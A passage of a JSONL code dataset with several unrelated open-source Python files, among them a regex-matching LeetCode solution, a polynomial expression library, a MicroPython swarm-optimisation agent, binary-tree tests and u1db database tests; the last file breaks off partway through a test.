\"\"\"For quick debugging\"\"\"\n def test(yaw, pitch, roll):\n print(yaw, pitch, roll)\n controller = ControllerThread(0, test)\n controller.start()\n controller.connectButton(0, controller.printAllAxis)\n try:\n while(1):\n pass\n #controller.checkPressedButtons()\n except KeyboardInterrupt:\n pygame.quit()\n","repo_name":"debnera/arduino-quadcopter","sub_path":"FlightController/Python/GraphicalController/gamepad.py","file_name":"gamepad.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14728052045","text":"class Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n ls = len(s)\n lp = len(p)\n print(\"ls, lp=\",ls, lp)\n ls = ls + 1\n lp = lp +1\n #if s == '' or p == ' ': \n #return False \n dp = [[False]*lp for i in range(ls)]\n print(\"array\",dp)\n dp[0][0] = True\n for i,c in enumerate(p):\n print(\"i,c=\",i, c,\"dp[\",0,\"][\",i-1,\"] = \", dp[0][i-1])\n if(c =='*' and dp[0][i-1]):\n print(\"dp 0\", i+1, \"=true\")\n dp[0][i+1] = True\n print(dp)\n for i,char_s in enumerate(s):\n for j,char_p in enumerate(p):\n print(\"i,s=\",i, char_s, \"\\tj,p=\", j,char_p)\n if char_p == char_s:\n print(\"p==s\")\n dp[i+1][j+1] = dp[i][j]\n if char_p == '.':\n print(\"p==.\")\n dp[i+1][j+1] = dp[i][j]\n if char_p =='*':\n if p[j-1] != s[i] and p[j-1] !='.':\n dp[i+1][j+1] = dp[i+1][j-1]\n else:\n dp[i+1][j+1] = (dp[i+1][j] or dp[i][j+1] or dp[i+1][j-1])\n print(\"\\t\\ts \\t0 \\t1 \\t2 \\t3\")\n print(\"p\")\n st = \"012345\"\n for i,e in enumerate(dp):\n if i < 6:\n print(st[i], end=\"=>\")\n for j, e2 in enumerate(e):\n print(\"\\t\",e2, end=\",\")\n print()\n print(\"dp[\",ls-1,\"][\",lp-1,\"] = \",dp[ls-1][lp-1])\n return dp[len(s)][len(p)]\na = Solution()\nsol = a.isMatch(\"abcd\", \"a*.cd\")\nprint(\"solution\")\nprint(sol)","repo_name":"WengTzu/LeetCode","sub_path":"Algorithm/10_Regular_Expression_Matching/10_Java_To_Python.py","file_name":"10_Java_To_Python.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36680004206","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = None\n__version__ = '1.0'\n__license__ = None\n__copyright__ = None\n\n\nimport unittest\n\nfrom ade_detection.cli_handler import CliHandler\nfrom ade_detection.cli import Parser\n\n\nclass RunCadecTest(unittest.TestCase):\n '''Test a single run on CADEC'''\n\n\n def test(self):\n command = '--run single_run_cadec.json'.split()\n args = Parser().parse_args(command) \n CliHandler(args)\n","repo_name":"AilabUdineGit/ADE","sub_path":"integration_tests/run_cadec_test.py","file_name":"run_cadec_test.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"24308799119","text":"from collections import Counter\nfrom enum import Enum\n\nimport numpy as np\nimport sympy\nfrom scipy import sparse\n\n__all__ = (\"Expr\", \"VariableType\", \"Variable\", \"Polynomial\")\n\n\nclass Expr(object):\n \"\"\" Algebraic expressions (multivariate monomials) in form of\n :math:`c x_1^{k_1} x_2^{k_2} \\cdots x_m^{k_m}.`\"\"\"\n\n def __init__(self, coeff=1, variables=Counter()):\n self.variables = variables\n self.coeff = coeff\n\n @staticmethod\n def cast(other):\n \"\"\" Casts its input to an expression.\"\"\"\n\n if not isinstance(other, Expr):\n return Expr(other)\n else:\n return other\n\n def __add__(self, other):\n \"\"\" Expression addition.\"\"\"\n return Polynomial(self) + other # lift to polynomials.\n\n def __radd__(self, other):\n # Note: Keep the original order of summands.\n return other + Polynomial(self) # lift to polynomials.\n\n def __sub__(self, other):\n \"\"\" Expression subtraction.\"\"\"\n return Polynomial(self) - other # lift to polynomials.\n\n def __mul__(self, other):\n \"\"\" Multiplication of algebraic expressions.\"\"\"\n if isinstance(other, Polynomial):\n return Polynomial(self) * other\n\n other = Expr.cast(other)\n\n # a^b * a^c = a^(b + c)\n x, y = Counter(self.variables), Counter(other.variables)\n return Expr(self.coeff * other.coeff, x + y)\n\n __rmul__ = __mul__ # make multiplication commute again.\n\n def __pow__(self, n):\n \"\"\" Expression exponentiation.\"\"\"\n assert n >= 0, \"negative exponent.\"\n\n if n == 0:\n return Expr(coeff=1, variables=Counter())\n\n xs = Counter(self.variables)\n for v in self.variables:\n xs[v] *= n # (a^b)^c = a^(b * c)\n\n return Expr(self.coeff ** n, xs)\n\n def __repr__(self):\n monic_monomial = \" \".join(\n [\n variable.__repr__() + \"^\" + str(self.variables[variable])\n for variable in self.variables\n ]\n )\n\n if self.coeff == 1 and len(monic_monomial) > 0:\n return monic_monomial\n else:\n return str(self.coeff) + \" \" + monic_monomial\n\n def related(self, other):\n \"\"\" Checks if the two expressions are related, i.e. have\n the same exponents and perpahs a different coefficient.\"\"\"\n other = Expr.cast(other)\n return self.variables == other.variables\n\n @property\n def is_constant(self):\n \"\"\" True iff the expression represents a constant.\"\"\"\n return len(self.variables) == 0\n\n @property\n def weight(self):\n return self.coeff * np.prod(\n [variable.value ** self.variables[variable] for variable in self.variables]\n )\n\n\nclass VariableType(Enum):\n PLAIN = 1 # regular, plain variables, e.g. Z.\n TYPE = 2 # variables corresponding to some types, i.e. having definitions.\n\n\nclass Variable(Expr):\n \"\"\" Symbolic variables.\"\"\"\n\n def __init__(self, tuning_param=None):\n super(Variable, self).__init__(1, Counter())\n\n self.variables[self] = 1\n self.type = VariableType.PLAIN\n self.tuning_param = tuning_param\n\n self.idx = None\n self.value = None\n\n @property\n def is_type_variable(self):\n \"\"\" True iff the variable represents a type variable.\n In other words, if it admits a defining equation.\"\"\"\n return self.type == VariableType.TYPE\n\n def __repr__(self):\n return \"var\" + str(self.idx)\n\n __str__ = __repr__\n\n def set_expectation(self, tuning_param):\n self.tuning_param = tuning_param\n\n\nclass Polynomial:\n \"\"\" Polynomials of multivariate algebraic expressions.\"\"\"\n\n def __init__(self, expressions):\n if isinstance(expressions, Expr):\n expressions = [expressions]\n\n self._expressions = expressions\n\n @staticmethod\n def cast(other):\n \"\"\" Casts its input to a polynomial.\"\"\"\n if isinstance(other, (int, float)):\n return Polynomial([Expr(other)])\n\n elif not isinstance(other, Polynomial):\n return Polynomial(other)\n\n else:\n return other\n\n @staticmethod\n def simplify(polynomial):\n \"\"\" Simplifies the given polynomial.\"\"\"\n\n equiv_classes = []\n n = len(polynomial)\n visited = [False] * n\n\n # group expressions\n for i in range(0, n):\n if not visited[i]:\n visited[i] = True\n equiv_class = [polynomial[i]]\n\n for j in range(i + 1, n):\n if polynomial[i].related(polynomial[j]):\n equiv_class.append(polynomial[j])\n visited[j] = True\n\n equiv_classes.append(equiv_class)\n\n # collect coefficients\n simpl_expressions = []\n for eqv in equiv_classes:\n\n coeff = 0\n for expr in eqv:\n coeff += expr.coeff\n\n if coeff != 0: # ignore vacuous terms\n expr = Expr(coeff, eqv[0].variables)\n simpl_expressions.append(expr)\n\n return Polynomial(simpl_expressions)\n\n @staticmethod\n def sum(series):\n \"\"\" Evaluates the sum of the given series.\"\"\"\n\n if len(series) > 0:\n p = series[0]\n for i in range(1, len(series)):\n p += series[i]\n\n return p\n else:\n return Polynomial(Expr(0))\n\n def __add__(self, other):\n \"\"\" Polynomial addition.\"\"\"\n other = Polynomial.cast(other)\n return Polynomial.simplify(self._expressions + other._expressions)\n\n def __radd__(self, other):\n # Note: Keep the original order of summands.\n other = Polynomial.cast(other)\n return Polynomial.simplify(other._expressions + self._expressions)\n\n def __sub__(self, other):\n \"\"\" Polynomial subtraction.\"\"\"\n if isinstance(other, (int, float)):\n return self + (-other)\n\n other = Polynomial.cast(other)\n xs = [-1 * e for e in other._expressions]\n return self + Polynomial(xs)\n\n def __mul__(self, other):\n \"\"\" Naive polynomial multiplication.\"\"\"\n other = Polynomial.cast(other)\n\n outcome = [] # naive but works\n for a in self._expressions:\n for b in other._expressions:\n outcome.append(a * b)\n\n return Polynomial.simplify(outcome)\n\n __rmul__ = __mul__ # make multiplication commute again\n\n def __pow__(self, n):\n \"\"\" Naive polynomial exponentiation.\"\"\"\n assert n >= 0, \"Non-positive exponent.\"\n\n if n == 0:\n return Polynomial(Expr(1))\n\n if n == 1:\n return Polynomial(self._expressions)\n\n if n % 2 == 1:\n return self * self ** (n - 1)\n else:\n other = self ** (n >> 1)\n return other * other\n\n def __iter__(self):\n return iter(self._expressions)\n\n def __repr__(self):\n return \" + \".join([expression.__repr__() for expression in self._expressions])\n\n def is_one(self):\n \"\"\" Checks if the polynomial represents a constant one.\"\"\"\n return (\n len(self._expressions) == 1\n and self._expressions[0].is_constant\n and self._expressions[0].coeff == 1\n )\n\n def is_variable(self):\n \"\"\" Checks if the polynomial represents a single variable.\"\"\"\n return len(self._expressions) == 1 and isinstance(\n self._expressions[0], Variable\n )\n\n @property\n def is_non_trivial(self):\n xs = [expr for expr in self._expressions if not expr.is_constant]\n return len(xs) > 1\n\n def specification(self, no_variables):\n \"\"\" Composes a sparse matrix specification of the polynomial. Requires\n as input a number dictating the number of columns of the constructed\n matrix (usually the number of variables in the corresponding\n optimisation problem).\n\n Its output is a tuple consisting of:\n\n (1) a sparse matrix representing the polynomial,\n (2) a vector of logarithms of monomial coefficients,\n (3) a (collective) constant term representing constant monomials.\n\n The matrix represents expoenents of respective variables.\"\"\"\n\n rows = 0 # row counter\n row, col, data = [], [], []\n constant_expr = 0\n coeffs = []\n\n for exp in self:\n if isinstance(exp, Expr):\n if exp.coeff <= 0 and not exp.is_constant:\n raise ValueError(\"Non-positive monomial coefficient.\")\n\n if exp.coeff > 0:\n # coeffs.append(sympy.log(exp.coeff))\n coeffs.append(np.float64((sympy.log(exp.coeff)).evalf()))\n else:\n constant_expr += exp.coeff\n\n for (v, e) in exp.variables.items():\n row.append(rows)\n col.append(v.idx)\n data.append(e)\n rows += 1\n else:\n constant_expr += exp # constant\n\n # create a sparse representation of the polynomial,\n # together with logarithms of respective monomial coefficients and\n # the collected constant term (unaltered).\n return (\n sparse.csr_matrix(\n (np.array(data), (np.array(row), np.array(col))),\n shape=(rows, no_variables),\n dtype=\"double\",\n ),\n np.array(coeffs),\n constant_expr,\n )\n","repo_name":"maciej-bendkowski/paganini","sub_path":"paganini/expressions.py","file_name":"expressions.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"40129116832","text":"import machine\nimport random\nimport ubinascii\nimport ujson\nimport urequests\nimport utime\nfrom hcsr04 import HCSR04\n\n\ndef func(x, y):\n return x ** 2 + y ** 2\n\n\ndef get_random():\n \"\"\"Get random value. Useful for emulated agent\"\"\"\n tv = int(utime.time())\n utime.sleep_ms(random.randrange(1, 100))\n r = float('0.{}'.format(tv)) * (-1) ** (int(utime.time()) % 2)\n\n return r\n\n\ndef get_location():\n \"\"\"Get location of agent\"\"\"\n return [get_random(), get_random()]\n\n\ndef get_parameters(url):\n \"\"\"Get from cloud main parameters for algorithm\"\"\"\n url += '/parameters'\n response = urequests.get(url)\n response_json = response.json()\n w = response_json['w']\n c1 = response_json['c1']\n c2 = response_json['c2']\n iterations = response_json['iterations']\n\n response.close()\n\n return w, c1, c2, iterations\n\n\ndef post_message(url, chip_id, message):\n \"\"\"Put status of agent into logger server\"\"\"\n response = urequests.post(url, data=ujson.dumps(\n {\n 'id': chip_id,\n 'message': message\n }\n ))\n response.close()\n\n\ndef post_data(url, chip_id, iteration, data, value):\n \"\"\"Put data of agent into cloud\"\"\"\n response = urequests.post(url, data=ujson.dumps(\n {\n 'id': chip_id,\n 'iteration': iteration,\n 'data': data,\n 'value': value\n }\n ))\n response.close()\n\n\ndef get_data(url, log_url, chip_id, iteration):\n \"\"\"\n Get main data from cloud.\n \"\"\"\n while True:\n response = urequests.get(url, data=ujson.dumps(\n {\n 'iteration': iteration\n }\n ))\n\n if response.status_code == 200:\n break\n\n message = 'Wait'\n post_message(log_url, chip_id, message)\n\n response.close()\n utime.sleep_ms(5000)\n\n response_json = response.json()\n gbest = response_json['Gbest']\n pbest = response_json['Pbest']\n r1 = response_json['r1']\n r2 = response_json['r2']\n\n response.close()\n\n return gbest, pbest, r1, r2\n\n\ndef run(chip_id, host, log_host, get_value_function):\n \"\"\"Main program of PSO algorithm\n\n :param chip_id: id of the chip\n :param host: host of the cloud\n :param log_host: host of the logger server\n :param get_value_function: function,\n which return value of the agent for specified location\n \"\"\"\n velocity = [0, 0]\n data = get_location()\n url = host + 'data'\n logger = log_host + 'message'\n\n w, c1, c2, iterations = get_parameters(url)\n\n for iteration in range(iterations):\n value = get_value_function(*data)\n\n message = ujson.dumps({\n 'iteration': iteration,\n 'data': data,\n 'value': value\n })\n post_message(logger, chip_id, message)\n post_data(url, chip_id, iteration, data, value)\n\n gbest, pbest, r1, r2 = get_data(url, logger, chip_id, iteration)\n\n for i in range(2):\n velocity[i] = w * velocity[i] + c1 * r1 * (\n pbest[i] - data[i]) + c2 * r2 * (gbest[i] - data[i])\n data[i] += velocity[i]\n\n\ndef main():\n with open('config.json', 'r') as file:\n config = ujson.load(file)\n\n # Get main parameters from config file config.json\n IP = config['host']\n PORT = config['port']\n LOG_PORT = config['logPort']\n HOST = '{}:{}/'.format(IP, PORT)\n LOG = '{}:{}/'.format(IP, LOG_PORT)\n\n # Set main variables for algorithm\n CHIP_ID = machine.unique_id()\n if CHIP_ID == b'upy-non-unique':\n CHIP_ID = 'agent-{}'.format(int(utime.time()))\n GET_VALUE_FUNCTION = lambda *args: func(*args)\n else:\n CHIP_ID = ubinascii.hexlify(machine.unique_id())\n\n trig_pin = 16\n echo_pin = 0\n sensor = HCSR04(trigger_pin=trig_pin, echo_pin=echo_pin)\n GET_VALUE_FUNCTION = lambda *args: sensor.distance_cm()\n\n # Run agent program\n run(CHIP_ID, HOST, LOG, GET_VALUE_FUNCTION)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LickevicVL/microSwarm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38303556278","text":"from core.abstractions import AbstractScenarioSerializer\nfrom core.decorators import try_except_wrapper\nfrom .word import Word\n\n\nclass WordsScenarioSerilizer(AbstractScenarioSerializer):\n\n @try_except_wrapper\n def serialize(self, m_data):\n result = []\n for d in m_data:\n if not isinstance(d, Word):\n raise ValueError('Incorrect data type')\n sc_part = {attr: getattr(d, attr) for attr in d.__slots__}\n result.append(sc_part)\n return result\n\n @try_except_wrapper\n def deserialize(self, sc_data):\n result = []\n for d in sc_data:\n word = Word(*[d[attr] for attr in Word.__slots__])\n result.append(word)\n return result\n","repo_name":"Serega-SPb/lang_tutor","sub_path":"modules/module_words/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41241173558","text":"#! /usr/bin/env python3\n\nimport unittest\nimport TreeBinary as tb\nimport random\n\nclass TestTreeBinary(unittest.TestCase):\n def setUp(self):\n self.tree = tb.TreeBinary()\n \n self.keys = [12, 5, 18, 2, 9, 15, 19, 13, 17]\n for key in self.keys:\n self.tree.insert(tb.Node(key)) \n \n def test_search(self):\n self.assertEqual(12, self.tree.search(12).key)\n self.assertEqual(None, self.tree.search(7))\n\n def test_min_max(self):\n self.assertEqual(min(self.keys), self.tree.min.key)\n self.assertEqual(max(self.keys), self.tree.max.key) \n\n\n def test_predecessor(self):\n node_1 = self.tree.search(13)\n self.assertEqual(12, self.tree.predecessor(node_1).key)\n node_2 = self.tree.search(2)\n self.assertEqual(None, self.tree.predecessor(node_2))\n node_3 = self.tree.search(12)\n self.assertEqual(9, self.tree.predecessor(node_3).key)\n\n def test_successor(self):\n node_1 = self.tree.search(9)\n node_2 = self.tree.search(19)\n node_3 = self.tree.search(12)\n \n self.assertEqual(12, self.tree.successor(node_1).key) \n self.assertEqual(None, self.tree.successor(node_2))\n self.assertEqual(13, self.tree.successor(node_3).key)\n def test_insert_walk(self):\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n \n def test_delete(self):\n node_1 = self.tree.search(2)\n node_2 = self.tree.search(18)\n self.tree.delete(node_1)\n self.keys.remove(2)\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n self.tree.delete(node_2)\n self.keys.remove(18)\n self.assertEqual(sorted(self.keys), self.tree.walk_in_order())\n \n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"huragok/Practice","sub_path":"ITA/3_Data Structrues/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74773958819","text":"import simplejson\nfrom u1db import (\n Document,\n errors,\n tests,\n )\nfrom u1db.tests import c_backend_wrapper, c_backend_error\nfrom u1db.tests.test_remote_sync_target import (\n http_server_def,\n oauth_http_server_def,\n )\n\n\nclass TestCDatabaseExists(tests.TestCase):\n\n def test_exists(self):\n if c_backend_wrapper is None:\n self.fail(\"Could not import the c_backend_wrapper module.\"\n \" Was it compiled properly?\\n%s\" % (c_backend_error,))\n\n\n# Rather than lots of failing tests, we have the above check to test that the\n# module exists, and all these tests just get skipped\nclass BackendTests(tests.TestCase):\n\n def setUp(self):\n super(BackendTests, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n\n\nclass TestCDatabase(BackendTests):\n\n def test_exists(self):\n if c_backend_wrapper is None:\n self.fail(\"Could not import the c_backend_wrapper module.\"\n \" Was it compiled properly?\")\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual(':memory:', db._filename)\n\n def test__is_closed(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertTrue(db._sql_is_open())\n db.close()\n self.assertFalse(db._sql_is_open())\n\n def test__run_sql(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertTrue(db._sql_is_open())\n self.assertEqual([], db._run_sql('CREATE TABLE test (id INTEGER)'))\n self.assertEqual([], db._run_sql('INSERT INTO test VALUES (1)'))\n self.assertEqual([('1',)], db._run_sql('SELECT * FROM test'))\n\n def test__get_generation(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual(0, db._get_generation())\n db.create_doc(tests.simple_doc)\n self.assertEqual(1, db._get_generation())\n\n def test__get_generation_info(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertEqual((0, None), db._get_generation_info())\n db.create_doc(tests.simple_doc)\n info = db._get_generation_info()\n self.assertEqual(1, info[0])\n self.assertTrue(info[1].startswith('T-'))\n\n def test__set_replica_uid(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n self.assertIsNot(None, db._replica_uid)\n db._set_replica_uid('foo')\n self.assertEqual([('foo',)], db._run_sql(\n \"SELECT value FROM u1db_config WHERE name='replica_uid'\"))\n\n def test_default_replica_uid(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.assertIsNot(None, self.db._replica_uid)\n self.assertEqual(32, len(self.db._replica_uid))\n # casting to an int from the uid *is* the check for correct behavior.\n int(self.db._replica_uid, 16)\n\n def test_get_conflicts_with_borked_data(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n # We add an entry to conflicts, but not to documents, which is an\n # invalid situation\n self.db._run_sql(\"INSERT INTO conflicts\"\n \" VALUES ('doc-id', 'doc-rev', '{}')\")\n self.assertRaises(Exception, self.db.get_doc_conflicts, 'doc-id')\n\n def test_create_index_list(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index_list(\"key-idx\", [\"key\"])\n docs = self.db.get_from_index('key-idx', 'value')\n self.assertEqual([doc], docs)\n\n def test_create_index_list_on_non_ascii_field_name(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(simplejson.dumps({u'\\xe5': 'value'}))\n self.db.create_index_list('test-idx', [u'\\xe5'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_list_indexes_with_non_ascii_field_names(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', [u'\\xe5'])\n self.assertEqual(\n [('test-idx', [u'\\xe5'])], self.db.list_indexes())\n\n def test_create_index_evaluates_it(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_wildcard_matches_unicode_value(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(simplejson.dumps({\"key\": u\"valu\\xe5\"}))\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', '*'))\n\n def test_create_index_fails_if_name_taken(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', ['key'])\n self.assertRaises(errors.IndexNameTakenError,\n self.db.create_index_list,\n 'test-idx', ['stuff'])\n\n def test_create_index_does_not_fail_if_name_taken_with_same_index(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index_list('test-idx', ['key'])\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([('test-idx', ['key'])], self.db.list_indexes())\n\n def test_create_index_after_deleting_document(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n doc2 = self.db.create_doc(tests.simple_doc)\n self.db.delete_doc(doc2)\n self.db.create_index_list('test-idx', ['key'])\n self.assertEqual([doc], self.db.get_from_index('test-idx', 'value'))\n\n def test_get_from_index(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n docs = self.db.get_from_index('key-idx', 'value')\n self.assertEqual([doc], docs)\n\n def test_get_from_index_list(self):\n # We manually poke data into the DB, so that we test just the \"get_doc\"\n # code, rather than also testing the index management code.\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n docs = self.db.get_from_index_list('key-idx', ['value'])\n self.assertEqual([doc], docs)\n\n def test_get_from_index_list_multi(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n content = '{\"key\": \"value\", \"key2\": \"value2\"}'\n doc = self.db.create_doc(content)\n self.db.create_index('test-idx', 'key', 'key2')\n self.assertEqual(\n [doc],\n self.db.get_from_index_list('test-idx', ['value', 'value2']))\n\n def test_get_from_index_list_multi_ordered(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc1 = self.db.create_doc('{\"key\": \"value3\", \"key2\": \"value4\"}')\n doc2 = self.db.create_doc('{\"key\": \"value2\", \"key2\": \"value3\"}')\n doc3 = self.db.create_doc('{\"key\": \"value2\", \"key2\": \"value2\"}')\n doc4 = self.db.create_doc('{\"key\": \"value1\", \"key2\": \"value1\"}')\n self.db.create_index('test-idx', 'key', 'key2')\n self.assertEqual(\n [doc4, doc3, doc2, doc1],\n self.db.get_from_index_list('test-idx', ['v*', '*']))\n\n def test_get_from_index_2(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n doc = self.db.create_doc(tests.nested_doc)\n self.db.create_index(\"multi-idx\", \"key\", \"sub.doc\")\n docs = self.db.get_from_index('multi-idx', 'value', 'underneath')\n self.assertEqual([doc], docs)\n\n def test_get_index_keys(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_doc(tests.simple_doc)\n self.db.create_index(\"key-idx\", \"key\")\n keys = self.db.get_index_keys('key-idx')\n self.assertEqual([(\"value\",)], keys)\n\n def test__query_init_one_field(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index(\"key-idx\", \"key\")\n query = self.db._query_init(\"key-idx\")\n self.assertEqual(\"key-idx\", query.index_name)\n self.assertEqual(1, query.num_fields)\n self.assertEqual([\"key\"], query.fields)\n\n def test__query_init_two_fields(self):\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.db.create_index(\"two-idx\", \"key\", \"key2\")\n query = self.db._query_init(\"two-idx\")\n self.assertEqual(\"two-idx\", query.index_name)\n self.assertEqual(2, query.num_fields)\n self.assertEqual([\"key\", \"key2\"], query.fields)\n\n def assertFormatQueryEquals(self, expected, wildcards, fields):\n val, w = c_backend_wrapper._format_query(fields)\n self.assertEqual(expected, val)\n self.assertEqual(wildcards, w)\n\n def test__format_query(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value = ? ORDER BY d0.value\",\n [0], [\"1\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value = ?\"\n \" ORDER BY d0.value, d1.value\",\n [0, 0], [\"1\", \"2\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1, document_fields d2\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value = ?\"\n \" AND d0.doc_id = d2.doc_id\"\n \" AND d2.field_name = ? AND d2.value = ?\"\n \" ORDER BY d0.value, d1.value, d2.value\",\n [0, 0, 0], [\"1\", \"2\", \"3\"])\n\n def test__format_query_wildcard(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value NOT NULL ORDER BY d0.value\",\n [1], [\"*\"])\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id\"\n \" FROM document_fields d0, document_fields d1\"\n \" WHERE d0.field_name = ? AND d0.value = ?\"\n \" AND d0.doc_id = d1.doc_id\"\n \" AND d1.field_name = ? AND d1.value NOT NULL\"\n \" ORDER BY d0.value, d1.value\",\n [0, 1], [\"1\", \"*\"])\n\n def test__format_query_glob(self):\n self.assertFormatQueryEquals(\n \"SELECT d0.doc_id FROM document_fields d0\"\n \" WHERE d0.field_name = ? AND d0.value GLOB ? ORDER BY d0.value\",\n [2], [\"1*\"])\n\n\nclass TestCSyncTarget(BackendTests):\n\n def setUp(self):\n super(TestCSyncTarget, self).setUp()\n self.db = c_backend_wrapper.CDatabase(':memory:')\n self.st = self.db.get_sync_target()\n\n def test_attached_to_db(self):\n self.assertEqual(\n self.db._replica_uid, self.st.get_sync_info(\"misc\")[0])\n\n def test_get_sync_exchange(self):\n exc = self.st._get_sync_exchange(\"source-uid\", 10)\n self.assertIsNot(None, exc)\n\n def test_sync_exchange_insert_doc_from_source(self):\n exc = self.st._get_sync_exchange(\"source-uid\", 5)\n doc = c_backend_wrapper.make_document('doc-id', 'replica:1',\n tests.simple_doc)\n self.assertEqual([], exc.get_seen_ids())\n exc.insert_doc_from_source(doc, 10, 'T-sid')\n self.assertGetDoc(self.db, 'doc-id', 'replica:1', tests.simple_doc,\n False)\n self.assertEqual((10, 'T-sid'),\n self.db._get_sync_gen_info('source-uid'))\n self.assertEqual(['doc-id'], exc.get_seen_ids())\n\n def test_sync_exchange_conflicted_doc(self):\n doc = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 5)\n doc2 = c_backend_wrapper.make_document(doc.doc_id, 'replica:1',\n tests.nested_doc)\n self.assertEqual([], exc.get_seen_ids())\n # The insert should be rejected and the doc_id not considered 'seen'\n exc.insert_doc_from_source(doc2, 10, 'T-sid')\n self.assertGetDoc(\n self.db, doc.doc_id, doc.rev, tests.simple_doc, False)\n self.assertEqual([], exc.get_seen_ids())\n\n def test_sync_exchange_find_doc_ids(self):\n doc = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n self.assertEqual(0, exc.target_gen)\n exc.find_doc_ids_to_return()\n doc_id = exc.get_doc_ids_to_return()[0]\n self.assertEqual(\n (doc.doc_id, 1), doc_id[:-1])\n self.assertTrue(doc_id[-1].startswith('T-'))\n self.assertEqual(1, exc.target_gen)\n\n def test_sync_exchange_find_doc_ids_not_including_recently_inserted(self):\n doc1 = self.db.create_doc(tests.simple_doc)\n doc2 = self.db.create_doc(tests.nested_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n doc3 = c_backend_wrapper.make_document(doc1.doc_id,\n doc1.rev + \"|zreplica:2\", tests.simple_doc)\n exc.insert_doc_from_source(doc3, 10, 'T-sid')\n exc.find_doc_ids_to_return()\n self.assertEqual(\n (doc2.doc_id, 2), exc.get_doc_ids_to_return()[0][:-1])\n self.assertEqual(3, exc.target_gen)\n\n def test_sync_exchange_return_docs(self):\n returned = []\n\n def return_doc_cb(doc, gen, trans_id):\n returned.append((doc, gen, trans_id))\n\n doc1 = self.db.create_doc(tests.simple_doc)\n exc = self.st._get_sync_exchange(\"source-uid\", 0)\n exc.find_doc_ids_to_return()\n 